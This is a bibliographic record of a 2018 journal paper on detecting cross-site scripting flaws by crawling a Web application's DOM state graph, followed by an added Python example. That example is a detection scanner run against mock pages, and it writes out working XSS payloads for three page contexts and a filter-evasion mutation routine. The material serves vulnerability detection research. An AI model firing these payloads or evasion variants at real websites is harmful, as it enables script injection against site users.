
Authors:

Wang, D.; Liu, L.; Lin, J.; Zhao, W.; Du, X.

Indexed in:

Scopus, PKU, CSCD

Abstract:

To improve the scanning coverage of hidden injection points in cross-site scripting (XSS) vulnerability detection, and to decide reliably whether an injection point can actually be attacked, a method is proposed that constructs a Web state transition graph of the Web application and searches for XSS injection points while the graph is being built. The document object model (DOM) state is used as the node and the browser event as the edge to model the Web application and to identify hidden injection points. At the same time, Web page analysis is combined with agent technology to improve the accuracy with which injection points are judged. First, the Web page is analysed for its references, i.e. uniform resource locators (URLs) and Forms. Then, the page elements bound to browser events are triggered to detect whether they issue data requests, which decides whether the page has a suspected injection point. Third, each suspected injection point is tested with the probe vector technique, and, according to the output position of the probe vector in the response, the injection point is classified and saved. To determine effectively whether an injection point is exploitable, the XSS Filter Evasion Cheat Sheet is transformed by mutation operations and filter-escaping techniques, and attack vectors with a higher success rate are designed and classified according to their response position. Attack vectors, injection points and injection results are all classified by response position, and a separate response-analysis method is designed for each class to decide whether an XSS vulnerability exists. Finally, an XSS vulnerability detection system is designed and implemented on this basis, and experimental comparison verifies its effectiveness. © 2018, Editorial Department of Journal of Beijing University of Technology. All rights reserved.
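The probe-vector step and the response-position classification described in the abstract, as an added worked example that is not the paper's code. The crawler and Selenium side of the method is replaced by constructed page renderers (hypothetical names `render_text`, `render_attr`, `render_script`, `render_escaped`, `render_strip`, `render_none`) that stand in for the HTTP responses a crawler would collect, and the small vector list plus `mutate` is a simplified stand-in for the paper's transformed XSS Filter Evasion Cheat Sheet. Only the Python standard library is used.

```python
"""Probe-vector classification of reflected XSS injection points, with
context-specific attack vectors and per-position response analysis.
Added example (not the paper's code); the renderers below are constructed
stand-ins for server responses, with hypothetical names."""
import html
import re
import secrets
from html.parser import HTMLParser

def render_text(v):     # echoed unescaped into element text
    return f"<html><body><p>Hello {v}</p></body></html>"

def render_attr(v):     # echoed unescaped into a double-quoted attribute
    return f'<html><body><input type="text" value="{v}"></body></html>'

def render_script(v):   # echoed into a JS string literal with no JS escaping
    return f'<html><body><script>var q = "{v}";</script></body></html>'

def render_escaped(v):  # same text context as render_text, correctly escaped
    return f"<html><body><p>Hello {html.escape(v)}</p></body></html>"

def render_strip(v):    # weak blacklist: strips < and >, keeps quotes
    return f"<html><body><p>Hello {re.sub(r'[<>]', '', v)}</p></body></html>"

def render_none(v):     # parameter never reflected at all
    return "<html><body><p>Hello</p></body></html>"

SPECIALS = '<"\'>'      # characters whose survival decides exploitability

class ReflectionParser(HTMLParser):
    """Record where a token lands (attribute value, <script> body or text)
    and collect every on* event-handler attribute in the response."""
    def __init__(self, token):
        super().__init__()
        self.token, self.in_script, self.attr_hit = token, False, False
        self.script_buf, self.text_buf, self.handlers = [], [], []
    def handle_starttag(self, tag, attrs):      # tag/attr names are lower-cased
        if tag == 'script':
            self.in_script = True
        for name, value in attrs:
            if value and self.token in value:
                self.attr_hit = True
            if name.startswith('on'):
                self.handlers.append((tag, name, value or ''))
    def handle_endtag(self, tag):
        if tag == 'script':
            self.in_script = False
    def handle_data(self, data):                # data may arrive in chunks
        (self.script_buf if self.in_script else self.text_buf).append(data)
    def context(self):
        if self.attr_hit:
            return 'attr'
        if self.token in ''.join(self.script_buf):
            return 'script'
        if self.token in ''.join(self.text_buf):
            return 'text'
        return None

def parse(token, raw):
    parser = ReflectionParser(token)
    parser.feed(raw)
    parser.close()
    return parser

def classify_injection_point(render):
    """Send '<token><"'><token>' and return (output position, set of special
    characters that came back unescaped between the two tokens)."""
    token = 'p' + secrets.token_hex(4)
    raw = render(f'{token}{SPECIALS}{token}')
    first = raw.find(token)
    second = raw.find(token, first + len(token)) if first >= 0 else -1
    between = raw[first + len(token):second] if second > first else ''
    return parse(token, raw).context(), {c for c in SPECIALS if c in between}

# per output position: characters that must survive, and base attack vectors
VECTORS = {
    'text':   ('<>', ['<img src=x onerror=alert(1)>', '<svg onload=alert(1)>']),
    'attr':   ('"',  ['" autofocus onfocus=alert(1) x="']),
    'script': ('"',  ['";alert(1);//']),
}

def mutate(vector):
    """Simplified mutation step: alternate the case of tag and attribute names
    (HTML is case-insensitive, the JS payload is not) and replace the space
    after the tag name with '/'. Returns the de-duplicated variants in order."""
    mixed = re.sub(r'(?<=[<\s"])[a-z]+(?=[\s=])',
                   lambda m: ''.join(c.upper() if i % 2 else c
                                     for i, c in enumerate(m.group())), vector)
    slashed = re.sub(r'^<(\w+) ', r'<\1/', vector)
    return list(dict.fromkeys([vector, mixed, slashed]))

def confirmed(ctx, raw, vector):
    """Response analysis by output position: in text/attr context an on*
    handler carrying the canary must exist; in script context browsers do not
    decode entities, so the vector must appear verbatim in the script body."""
    parser = parse('\0', raw)
    if ctx == 'script':
        return vector in ''.join(parser.script_buf)
    return any('alert(1)' in value for _, _, value in parser.handlers)

def scan(render):
    """Probe, classify, check which specials survived, then try the vectors
    for that position. Returns (context, vulnerable, first working vector)."""
    ctx, survivors = classify_injection_point(render)
    if ctx is None:
        return (None, False, None)
    needed, bases = VECTORS[ctx]
    if not set(needed) <= survivors:          # reflected but filtered/escaped
        return (ctx, False, None)
    for base in bases:
        for vector in mutate(base):
            if confirmed(ctx, render(vector), vector):
                return (ctx, True, vector)
    return (ctx, False, None)

if __name__ == '__main__':
    for r in (render_text, render_attr, render_script, render_escaped, render_strip, render_none):
        print(f'{r.__name__:15} -> {scan(r)}')
```

The two-token probe is what makes the filter check robust: whatever the application does to the special characters, the raw bytes between the two copies of the token show exactly which of `<`, `"`, `'`, `>` survived, independently of how the HTML parser later interprets them. Classification comes from the parser, exploitability from the raw bytes, and the verdict is taken per position, which is why `render_escaped` and `render_strip` are reported as reflected but not vulnerable while the three unescaped renderers each fall to a vector matching their context.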

Keywords:

Crawler; Cross-site scripting (XSS); Document object model (DOM); Selenium; State transition diagram

Author affiliations:

  • [ 1 ] [Wang, D.] Faculty of Information Technology, Beijing University of Technology, Beijing, 100124, China
  • [ 2 ] [Liu, L.] Faculty of Information Technology, Beijing University of Technology, Beijing, 100124, China
  • [ 3 ] [Lin, J.] Key Lab of Information Network Security of Ministry of Public Security, The Third Research Institute of Ministry of Public Security, Shanghai, 200031, China
  • [ 4 ] [Zhao, W.] Faculty of Information Technology, Beijing University of Technology, Beijing, 100124, China
  • [ 5 ] [Du, X.] Faculty of Information Technology, Beijing University of Technology, Beijing, 100124, China


Source:

Journal of Beijing University of Technology

ISSN: 0254-0037

Year: 2018

Issue: 9

Volume: 44

Pages: 1208-1216

Citations:

WoS Core Collection citations: 0

Scopus citations: 2

ESI highly cited paper: 0
